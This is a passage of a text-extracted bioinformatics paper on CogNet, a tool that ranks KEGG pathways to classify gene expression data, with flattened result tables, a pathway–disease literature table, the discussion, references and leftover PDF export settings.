16 52 95 27 51 9 110 56 55 59 14 33 22 41 15 50 84 26 45 8 98 53 50 53 13 31 22 39 14 48 77 23 35 (Continued) Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 13/20 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS1962 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2519 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2547 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3268 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3646 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3837 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3874 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS4516 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS5037 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS5499 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2609 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3794 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS4824 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS1962 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2519 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2547 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3268 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3646 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3837 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3874 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS4516 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS5037 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS5499 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2609 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3794 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS4824 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ For each tool other than SVM-RCE, we have obtained the performance over the top 1–10 groups that were ranked by the scoring stage. For SVM-RCE we obtained the performance starting by 1,000 genes and 100 clusters, then reduced 10% at each iteration. For comparing purposes, we consider the last 10 clusters. Table 6 presents in detail all the results obtained applying the CogNet_RF tool. The AUC measure is presented. The columns #G present the average of the number of genes over the 10 iterations was applied as a cross-validation. Figure 6 presents the average of all AUC results over the 13 datasets on the 10 clusters/ groups, for each tool (Avg AUC bar), while the Avg#Genes bar represent the average of the number of genes over the 13 datasets on the 10 clusters/groups. The results presented in Tables 6A–6C and Fig. 6, indicate that on average CogNet outperforms maTE by 3% while getting similar results with SVM-RCE. Considering the number of genes, SVM-RCE is 37 folds greater than CogNet. Additional observation that both tools SVM-RCE and maTE failed to reach reasonable results on the data GDS2519, while CogNet reached performance of about 65–70%. Figure 6 The average of the results for the three tools. The upper part is the performance AUC measurement while the lower part is the number of genes (#G). Full-size DOI: 10.7717/peerj-cs.336/fig-6 Table 6 (continued) #Clusters/ #Groups CogNet_RF GDS1962 GDS2519 GDS2547 GDS3268 GDS3646 GDS3837 GDS3874 GDS4516_4718 GDS5037 GDS5499 GDS2609 GDS3794 GDS4824 AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC 7 88 42 42 47 13 29 19 35 14 46 68 22 26 6 80 34 36 41 11 26 19 30 13 44 62 20 26 5 70 26 30 35 10 24 17 26 9 41 52 18 22 4 62 27 25 28 8 20 16 22 7 37 41 15 17 3 52 22 19 21 7 17 13 17 6 29 32 13 13 2 38 16 13 13 6 13 10 13 3 21 22 9 9 1 8 8 7 6 5 6 6 8 4 8 11 5 5 Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 14/20 http://dx.doi.org/10.7717/peerj-cs.336/fig-6 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS1962 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2519 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2547 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3268 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3646 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3837 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3874 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS4516 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS5037 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS5499 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2609 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3794 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS4824 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ Table 7 Association of the top pathways with the disease under study. “Dataset” indicates the dataset GEO ID. Dataset Investigated disease ID Pathway Literature support PMID GSE15573 Rheumatoid Arthritis hsa04932 Non-alcoholic fatty liver disease (NAFLD) None None GSE15574 Rheumatoid Arthritis hsa04120 Ubiquitin mediated proteolysis Aberration of this system leads to the dysregulation of cellular homeostasis and the development of multiple inflammatory and autoimmune diseases, including rheumatoid arthritis. 16978533 GSE15575 Rheumatoid Arthritis hsa05016 Huntington disease None None GSE15576 Rheumatoid Arthritis hsa04714 Thermogenesis None None GSE15577 Rheumatoid Arthritis hsa04723 Retrograde endocannabinoid signaling Endocannabinoids, a group of endogenous bioactive lipids, have immunomodulatory effects able to influence both inflammation and pain in rheumatic disease, including rheumatoid arthritis. 29164003, 28857069 GSE15578 Rheumatoid Arthritis hsa05010 Alzheimer disease None None GSE15579 Rheumatoid Arthritis hsa04140 Autophagy Deregulation of autophagic pathway has recently been implicated in the pathogenesis of several autoimmune diseases, including rheumatoid arthritis. 30072986 GSE15580 Rheumatoid Arthritis hsa04621 NOD-like receptor signaling pathway NOD-like receptors are being implicated in the pathology of RA and other rheumatic diseases. 19835640 GSE15581 Rheumatoid Arthritis hsa05012 Parkinson disease None None GSE15582 Rheumatoid Arthritis hsa05203 Viral carcinogenesis None None GSE4107 Colorectal Cancer hsa04915 Estrogen signaling pathway None None GSE4107 Colorectal Cancer hsa04662 B cell receptor signaling pathway None None GSE4107 Colorectal Cancer hsa04012 ErbB signaling pathway ERBB pathway may have a role in both normal colon epithelial cell differentiation and malignant transformation. 27270421 GSE4107 Colorectal Cancer hsa05140 Leishmaniasis None None GSE4107 Colorectal Cancer hsa05224 Breast cancer None None GSE4107 Colorectal Cancer hsa04510 Focal adhesion Cancer cells exhibit highly altered focal adhesion dynamics. 28476046 GSE4107 Colorectal Cancer hsa04210 Apoptosis Abnormalities in apoptotic function contribute to both the pathogenesis of colorectal cancer and its resistance to chemotherapeutic drugs and radiotherapy. 15479695 GSE4107 Colorectal Cancer hsa04010 MAPK signaling pathway MAPK signaling plays an important part in progression of colorectal cancer. 15863380 GSE4107 Colorectal Cancer hsa05166 Human T-cell leukemia virus 1 infection None None GSE4107 Colorectal Cancer hsa05200 Pathways in cancer "Meta"-pathway of cancer pathways. None GSE55945 Prostate Cancer hsa04110 Cell cycle Dysregulation of the cell cycle is implicated in the biology of many cancers, including PCa. 7997877, 9096291, 18301781 (Continued) Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 15/20 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15573 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15574 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15575 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15576 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15577 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15578 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15579 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15580 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15581 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15582 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ Validation of the results We have conducted further analysis using the datasets (GSE15573, GSE4107 and GSE55945) that was considered in the pathfindR study. GSE15573 consists of 33 samples corresponding to 18 Rheumatoid Arthritis (RA) Patients and 15 Controls. The aim of this study is to identify peripheral blood gene expression profiles for RA patients. The study considers the standard statistical approaches in order to detect the significant genes by ANOVA with False Discovery Rate (FDR < 5%). The Gene Ontology (GO) in the PANTHER database is applied to identify biological processes. GSE4107 consists of 10 colonic mucosa of healthy control samples and 12 patient samples. Patients and controls were age- (50 or less), ethnicity- (Chinese) and tissue- matched. The analysis to detect significant genes was based on T-test, hierarchical clustering, mean fold-change and principal component. GSE55945 consists of 13 prostate cancer samples and 8 normal. The aim of the study is to compare the expression levels between malignant and benign prostate tissues. We have run the CogNet tool on those three datasets obtaining the performance on top significant pathways. The AUC values are presented in Table 6. Association of the top pathways with the disease under study For each dataset, the top 10 groups (pathways) identified by CogNet were manually examined in the literature for a possible association with the disease Table 7 (continued) Dataset Investigated disease ID Pathway Literature support PMID GSE55945 Prostate Cancer hsa04360 Axon guidance None None GSE55945 Prostate Cancer hsa04390 Hippo signaling pathway The hippo pathway effector YAP regulates motility, invasion, and castration-resistant growth of prostate cancer cells. 25645929 GSE55945 Prostate Cancer hsa05166 Human T-cell leukemia virus 1 infection None None GSE55945 Prostate Cancer hsa04014 Ras signaling pathway Ras signaling plays an important role in prostate cancer progression and is a possibly mediator of hormone resistance. 14689577, 20718703 GSE55945 Prostate Cancer hsa01040 Biosynthesis of unsaturated fatty acids Alterations in lipid metabolism, and specifically the uptake and synthesis of fatty acids (FAs), comprise a well-documented aspect of metabolic reprograming in cancer. 31598388 GSE55945 Prostate Cancer hsa05163 Human cytomegalovirus infection None None GSE55945 Prostate Cancer hsa04350 TGF-beta signaling pathway TGF-beta signaling has pivotal roles in tumorigenesis and tumor progression 26774024, 29115550 GSE55945 Prostate Cancer hsa04010 MAPK signaling pathway MAPK signaling pathways act through their effects on apoptosis, survival, metastatic potential, and androgen-independent growth in prostate cancer 22046506 GSE55945 Prostate Cancer hsa04933 AGE-RAGE signaling pathway in diabetic complications None None Note: “Investigated Disease” indicates the disease investigated by the study. “ID” and “Pathway” indicate the KEGG ID and pathway name of the top pathway, respectively. “Literature support” provides a brief summary of literature support for the pathway-disease association. “PMID” indicates the PubMed ID(s) of the supporting study/ studies. Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 16/20 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15573 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15573 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ under study. Literature support for the top 10 pathways per each dataset are presented in Table 7. For GSE15573, the rheumatoid arthritis dataset, 4 out the top 10 pathways were found to be supported by literature to be associated with rheumatoid arthritis biology. For GSE4107, comparing colorectal cancer patients to healthy controls, 5 out of the top 10 pathways were supported by literature to be associated with colorectal cancer. Finally, for GSE55945, the dataset comparing human prostate benign and malignant tissue, 6 out of the top 10 pathways were found to be associated with prostate cancer. The CogNet results highlighted several new pathways that could contribute to the identification of innovative clinical biomarkers for diagnostic procedures and therapeutic intervention. DISCUSSION AND CONCLUSIONS We have presented a novel tool called CogNet that is based on ranking and classification and integration of biological knowledge. CogNet is developed on top of the tool pathfindR to add to its functionality the ability to perform classification using the enriched KEGG pathways as features. CogNet outputs to the user the performance and a list of significant KEGG pathways that we believe will contribute to a better and deep understanding of the data under investigation. There is similarity between CogNet and maTE in that both rank a group of genes for classification tasks. However, CogNet is using the biological information of the KEGG pathways that was processed by an enrichment procedure to suggest a list of significant pathways, then CogNet ranks those pathways in terms of their contribution for separating the two-class of the given data (classification task). However, maTE uses prior information about microRNA and its target genes to group the genes. This grouping is not related to the expression of the genes as CogNet is considering. Moreover, SVM-RCE is using the clustering algorithm k-means in order to group the genes into clusters, that means that groups are related to the expression of the genes. As a future work, we would develop CogNet to explore the effectiveness of different combinations of the KEGG pathways in the data, that means instead of ranking each pathway’s genes individually, we will use a different approach to rank those groups simultaneously. In the current version, CogNet ranks each KEGG pathway individually by performing internal cross validation. Additionally, we are working to integrate CogNet and maTE where the process of the rank will be applied on the groups generated by the biological functions used in each tool. As a result, the discovery of the significant pathways and microRNA targets genes will suggest to the biology researcher to explore the role of pathways and microRNA together in the same data. The success of CogNet, maTE and SVM-RCE is suggesting that more computational approaches need to be developed based on the merit of integration of biological information into the machine learning algorithm. Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 17/20 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15573 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE55945 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Malik Yousef conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Ege Ülgen conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Osman Uğur Sezerman conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data is available at NCBI GEO: GDS1962, GDS2519, GDS3268, GDS2547, GDS5499, GDS3646, GDS3874, GDS3837, GDS5037, GDS4516, GDS4517, GDS4718, GSE4107, GDS2609, GSE15573, GDS3794, GSE5594, GDS4824. The code is available at GitHub: https://github.com/malikyousef/miRcorrNet. The DOI of the tool is available at Zenodo: malikyousef. (2020, November 14). malikyousef/miRcorrNet: miRcorrNet (Version v1.0). Zenodo. DOI 10.5281/zenodo. 4273942. REFERENCES Acharya S, Saha S, Nikhil N. 2017. Unsupervised gene selection using biological knowledge: application in sample clustering. BMC Bioinformatics 18(1):513 DOI 10.1186/s12859-017-1933-0. Ashburner M, Ball CA, Blake JA, Botstein D, Butler H, Cherry JM, Davis AP, Dolinski K, Dwight SS, Eppig JT, Harris MA, Hill DP, Issel-Tarver L, Kasarskis A, Lewis S, Matese JC, Richardson JE, Ringwald M, Rubin GM, Sherlock G. 2000. Gene ontology: tool for the unification of biology. Nature Genetics 25(1):25–29 DOI 10.1038/75556. Bellazzi R, Zupan B. 2007. Towards knowledge-based gene expression data mining. Journal of Biomedical Informatics 40(6):787–802 DOI 10.1016/j.jbi.2007.06.005. Berthold MR, Cebron N, Dill F, Gabriel TR, Kötter T, Meinl T, Ohl P, Thiel K, Wiswedel B. 2009. KNIME: the Konstanz information miner: version 2.0 and beyond. ACM SIGKDD Explorations Newsletter 11(1):26–31 DOI 10.1145/1656274.1656280. Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 18/20 http://www.ncbi.nlm.nih.gov/nuccore/GDS1962 http://www.ncbi.nlm.nih.gov/nuccore/GDS2519 http://www.ncbi.nlm.nih.gov/nuccore/GDS3268 http://www.ncbi.nlm.nih.gov/nuccore/GDS2547 http://www.ncbi.nlm.nih.gov/nuccore/GDS5499 http://www.ncbi.nlm.nih.gov/nuccore/GDS3646 http://www.ncbi.nlm.nih.gov/nuccore/GDS3874 http://www.ncbi.nlm.nih.gov/nuccore/GDS3837 http://www.ncbi.nlm.nih.gov/nuccore/GDS5037 http://www.ncbi.nlm.nih.gov/nuccore/GDS4516 http://www.ncbi.nlm.nih.gov/nuccore/GDS4517 http://www.ncbi.nlm.nih.gov/nuccore/GDS4718 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 http://www.ncbi.nlm.nih.gov/nuccore/GDS2609 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15573 http://www.ncbi.nlm.nih.gov/nuccore/GDS3794 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE5594 http://www.ncbi.nlm.nih.gov/nuccore/GDS4824 https://dx.doi.org/10.5281/zenodo.4273942 https://dx.doi.org/10.5281/zenodo.4273942 http://dx.doi.org/10.1186/s12859-017-1933-0 http://dx.doi.org/10.1038/75556 http://dx.doi.org/10.1016/j.jbi.2007.06.005 http://dx.doi.org/10.1145/1656274.1656280 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ Bradley AP. 1997. The use of the area under the ROC curve in the evaluation of machine learning algorithms. Pattern Recognition 30(7):1145–1159 DOI 10.1016/S0031-3203(96)00142-2. Clough E, Barrett T. 2016. The gene expression omnibus database. Methods in Molecular Biology 1418(5235):93–110 DOI 10.1007/978-1-4939-3578-9_5. Cohn-Alperovich D, Rabner A, Kifer I, Mandel-Gutfreund Y, Yakhini Z. 2016. Mutual enrichment in aggregated ranked lists with applications to gene expression regulation. Bioinformatics 32(17):i464–i472 DOI 10.1093/bioinformatics/btw435. Deshpande G, Li Z, Santhanam P, Coles CD, Lynch ME, Hamann S, Hu X. 2010. Recursive cluster elimination based support vector machine for disease state prediction using resting state functional and effective brain connectivity. PLOS ONE 5(12):e14277 DOI 10.1371/journal.pone.0014277. Fang OH, Mustapha N, Sulaiman MN. 2014. An integrative gene selection with association analysis for microarray data classification. Intelligent Data Analysis 18(4):739–758 DOI 10.3233/IDA-140666. Harris D, Niekerk AV. 2018. Feature clustering and ranking for selecting stable features from high dimensional remotely sensed data. International Journal of Remote Sensing 39(23):8934–8949 DOI 10.1080/01431161.2018.1500730. Inza I, Larrañaga P, Blanco R, Cerrolaza AJ. 2004. Filter versus wrapper gene selection approaches in DNA microarray domains. Artificial Intelligence in Medicine 31(2):91–103 DOI 10.1016/j.artmed.2004.01.007. Johannes M, Brase JC, Fröhlich H, Gade S, Gehrmann M, Fälth M, Sültmann H, Beissbarth T. 2010. Integration of pathway knowledge into a reweighted recursive feature elimination approach for risk stratification of cancer patients. Bioinformatics 26(17):2136–2144 DOI 10.1093/bioinformatics/btq345. Lazar C, Taminau J, Meganck S, Steenhoff D, Coletta A, Molter C, De Schaetzen V, Duque R, Bersini H, Nowé A. 2012. A survey on filter techniques for feature selection in gene expression microarray analysis. IEEE/ACM Transactions on Computational Biology and Bioinformatics 9(4):1106–1119 DOI 10.1109/TCBB.2012.33. Lazzarini N, Bacardit J. 2017. RGIFE: a ranked guided iterative feature elimination heuristic for the identification of biomarkers. BMC Bioinformatics 18(1):89 DOI 10.1186/s12859-017-1729-2. Nacu S, Critchley-Thorne R, Lee P, Holmes S. 2007. Gene expression network analysis and applications to immunology. Bioinformatics 23(7):850–858 DOI 10.1093/bioinformatics/btm019. Pan W. 2002. A comparative review of statistical methods for discovering differentially expressed genes in replicated microarray experiments. Bioinformatics 18(4):546–554 DOI 10.1093/bioinformatics/18.4.546. Papachristoudis G, Diplaris S, Mitkas PA. 2010. SoFoCles: feature filtering for microarray classification based on gene ontology. Journal of Biomedical Informatics 43(1):1–14 DOI 10.1016/j.jbi.2009.06.002. Perscheid C, Grasnick B, Uflacker M. 2019. Integrative gene selection on gene expression data: providing biological context to traditional approaches. Journal of Integrative Bioinformatics 16(1):27 DOI 10.1515/jib-2018-0064. Piñero J, Ramírez-Anguita JM, Saüch-Pitarch J, Ronzano F, Centeno E, Sanz F, Furlong LI. 2019. The DisGeNET knowledge platform for disease genomics: 2019 update. Nucleic Acids Research 18:gkz1021 DOI 10.1093/nar/gkz1021. Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 19/20 http://dx.doi.org/10.1016/S0031-3203(96)00142-2 http://dx.doi.org/10.1007/978-1-4939-3578-9_5 http://dx.doi.org/10.1093/bioinformatics/btw435 http://dx.doi.org/10.1371/journal.pone.0014277 http://dx.doi.org/10.3233/IDA-140666 http://dx.doi.org/10.1080/01431161.2018.1500730 http://dx.doi.org/10.1016/j.artmed.2004.01.007 http://dx.doi.org/10.1093/bioinformatics/btq345 http://dx.doi.org/10.1109/TCBB.2012.33 http://dx.doi.org/10.1186/s12859-017-1729-2 http://dx.doi.org/10.1093/bioinformatics/btm019 http://dx.doi.org/10.1093/bioinformatics/18.4.546 http://dx.doi.org/10.1016/j.jbi.2009.06.002 http://dx.doi.org/10.1515/jib-2018-0064 http://dx.doi.org/10.1093/nar/gkz1021 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ Qi J, Tang J. 2007. Integrating gene ontology into discriminative powers of genes for feature selection in microarray data. In: Proceedings of the 2007 ACM Symposium on Applied Computing—SAC ’07, Seoul, Korea, 430. Quanz B, Park M, Huan J. 2008. Biological pathways as features for microarray data classification. In: Proceeding of the 2nd International Workshop on Data and Text Mining in Bioinformatics— DTMBIO ’08. Napa Valley, California, USA, 5. Raghu VK, Ge X, Chrysanthis PK, Benos PV. 2017. Integrated theory-and data-driven feature selection in gene expression data analysis. In: 2017 IEEE 33rd International Conference on Data Engineering (ICDE). San Diego, CA, USA, 1525–1532. Ulgen E, Ozisik O, Sezerman OU. 2019. PathfindR: an R package for comprehensive identification of enriched pathways in omics data through active subnetworks. Frontiers in Genetics 10:490 DOI 10.3389/fgene.2019.00858. Van ’t Veer LJ, Dai H, Van de Vijver MJ, He YD, Hart AAM, Mao M, Peterse HL, Van der Kooy K, Marton MJ, Witteveen AT, Schreiber GJ, Kerkhoven RM, Roberts C, Linsley PS, Bernards R, Friend SH. 2002. Gene expression profiling predicts clinical outcome of breast cancer. Nature 415(6871):530–536 DOI 10.1038/415530a. Vanjimalar S, Ramyachitra D, Manikandan P. 2018. A review on feature selection techniques for gene expression data. In: 2018 IEEE International Conference on Computational Intelligence and Computing Research (ICCIC). 1–4. Yousef M, Abdallah L, Allmer J. 2019. maTE: discovering expressed interactions between microRNAs and their targets. Bioinformatics 35(20):4020–4028 DOI 10.1093/bioinformatics/btz204. Yousef M, Jung S, Showe L, Showe M. 2007. Recursive cluster elimination (RCE) for classification and feature selection from gene expression data. BMC Bioinformatics 8(1):144 DOI 10.1186/1471-2105-8-144. Yousef M, Ketany M, Manevitz L, Showe LC, Showe MK. 2009. Classification and biomarker identification using gene network modules and support vector machines. BMC Bioinformatics 10(1):337 DOI 10.1186/1471-2105-10-337. Zhao X, Wang L, Chen G. 2017. Joint covariate detection on expression profiles for identifying micrornas related to venous metastasis in Hepatocellular Carcinoma. Scientific Reports 7(1):5349 DOI 10.1038/s41598-017-05776-1. Zycinski G, Barla A, Squillario M, Sanavia T, Camillo BDi, Verri A. 2013. Knowledge driven variable selection (KDVS)—a new approach to enrichment analysis of gene signatures obtained from high–throughput data. Source Code for Biology and Medicine 8(1):33 DOI 10.1186/1751-0473-8-2. Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 20/20 http://dx.doi.org/10.3389/fgene.2019.00858 http://dx.doi.org/10.1038/415530a http://dx.doi.org/10.1093/bioinformatics/btz204 http://dx.doi.org/10.1186/1471-2105-8-144 http://dx.doi.org/10.1186/1471-2105-10-337 http://dx.doi.org/10.1038/s41598-017-05776-1 http://dx.doi.org/10.1186/1751-0473-8-2 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ CogNet: classification of gene expression data based on ranked active-subnetwork-oriented KEGG pathway enrichment analysis Introduction Materials and Methods Results Discussion and conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS 